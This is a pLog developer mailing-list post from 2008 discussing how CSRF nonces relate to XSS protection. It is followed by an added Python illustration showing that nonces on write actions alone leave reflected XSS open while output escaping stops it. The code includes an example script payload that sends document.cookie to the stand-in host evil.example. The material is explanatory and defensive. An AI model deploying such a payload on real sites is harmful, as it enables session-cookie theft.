[pLog-svn] xss in 1.2.7

Reto Hugi plog at hugi.to
Tue May 6 03:17:07 EDT 2008


Jon Daley wrote:
>     I must really not be getting XSS then.  If every post has to have a 
> token on it, how would someone guess the token in order to have the 
> javascript be accepted and displayed on the screen at all?  I'd expect 
> the token to be checked first, and simply die() if it doesn't match.
>     I can't figure out a scenario where an attacker would be able to get 
> javascript displayed on the screen to be executed within the context of 
> that domain to steal a cookie, or do anything.
> 

Jon, you're right on that very example. But I suppose we won't implement
the CSRF check (i.e. the nonce check) on every request, but only on the
ones writing to the database (that's where CSRF is the most dangerous).
And therefore we still need to make sure we are not vulnerable to XSS.

It was probably good to have this discussed once again. It's the only
way we all get the same understanding of those attacks :)

@matt: Or do you see a possibility of exploiting our XSS vuln. *if* we
had implemented the nonce on every request (that's the scenario Jon is
thinking about...)
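The following is an added illustration of the point made in this message, not code from pLog or from anyone on the list. It models a dispatcher that enforces a session-bound nonce only on write actions and leaves a read-only "search" page unchecked; the action names, the HMAC nonce scheme and the `escape_output` switch are assumptions made for the example. It shows that the nonce blocks a forged write but does nothing for a reflected payload on the unchecked page, which only output escaping neutralises.

```python
import hashlib
import hmac
import html
import secrets
from dataclasses import dataclass, field

# Hypothetical server-side secret used to derive per-session nonces (assumption).
SERVER_SECRET = secrets.token_bytes(32)

# Assumed split: only these actions write to the database and get the nonce check.
WRITE_ACTIONS = {"addPost", "deletePost", "updateSettings"}


@dataclass
class Request:
    method: str                 # "GET" or "POST"
    action: str                 # e.g. "search" or "deletePost"
    params: dict = field(default_factory=dict)
    session_id: str = ""        # value of the session cookie the browser sends


def make_nonce(session_id: str) -> str:
    """Nonce bound to the session; the site embeds it in its own forms."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def nonce_ok(req: Request) -> bool:
    expected = make_nonce(req.session_id)
    return hmac.compare_digest(expected, req.params.get("nonce", ""))


def handle(req: Request, escape_output: bool) -> tuple[int, str]:
    """Dispatch a request. The CSRF (nonce) check covers write actions only;
    escape_output toggles HTML-escaping of input reflected on read-only pages."""
    if req.action in WRITE_ACTIONS:
        # CSRF defence: a cross-site form post from the attacker's page carries
        # the victim's cookie but cannot carry the victim's nonce.
        if req.method != "POST" or not nonce_ok(req):
            return 403, "invalid or missing nonce"
        return 200, f"{req.action} done"

    if req.action == "search":
        # Read-only page: no nonce check, so the attacker can make the victim
        # load this URL with any q he likes (link, img src, iframe ...).
        q = req.params.get("q", "")
        shown = html.escape(q, quote=True) if escape_output else q
        return 200, f"<p>Results for: {shown}</p>"

    return 404, "unknown action"


# Constructed scenario: victim logged in with session "s1"; attacker lacks its nonce.
PAYLOAD = "<script>document.location='http://evil.example/?c='+document.cookie</script>"


def csrf_forgery_blocked() -> bool:
    forged = Request("POST", "deletePost", {"id": "7"}, session_id="s1")
    return handle(forged, escape_output=True)[0] == 403


def legitimate_write_ok() -> bool:
    good = Request("POST", "deletePost",
                   {"id": "7", "nonce": make_nonce("s1")}, session_id="s1")
    return handle(good, escape_output=True)[0] == 200


def reflected_xss_survives_nonce() -> bool:
    """Nonce on writes only: the search page still reflects the payload raw."""
    _, body = handle(Request("GET", "search", {"q": PAYLOAD}, "s1"), escape_output=False)
    return PAYLOAD in body


def escaping_neutralises_payload() -> bool:
    _, body = handle(Request("GET", "search", {"q": PAYLOAD}, "s1"), escape_output=True)
    return "<script" not in body and "&lt;script&gt;" in body


if __name__ == "__main__":
    print("CSRF forgery blocked:      ", csrf_forgery_blocked())
    print("legitimate write accepted: ", legitimate_write_ok())
    print("XSS still reflected (raw): ", reflected_xss_survives_nonce())
    print("XSS neutralised (escaped): ", escaping_neutralises_payload())
```

The two defences are orthogonal: the nonce answers "did this request originate from our own page?", which matters for state changes, while escaping answers "is this untrusted string safe to render?", which matters wherever request data reaches the response. Covering writes with a nonce leaves every read-only page that reflects input exactly as exposed as before.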


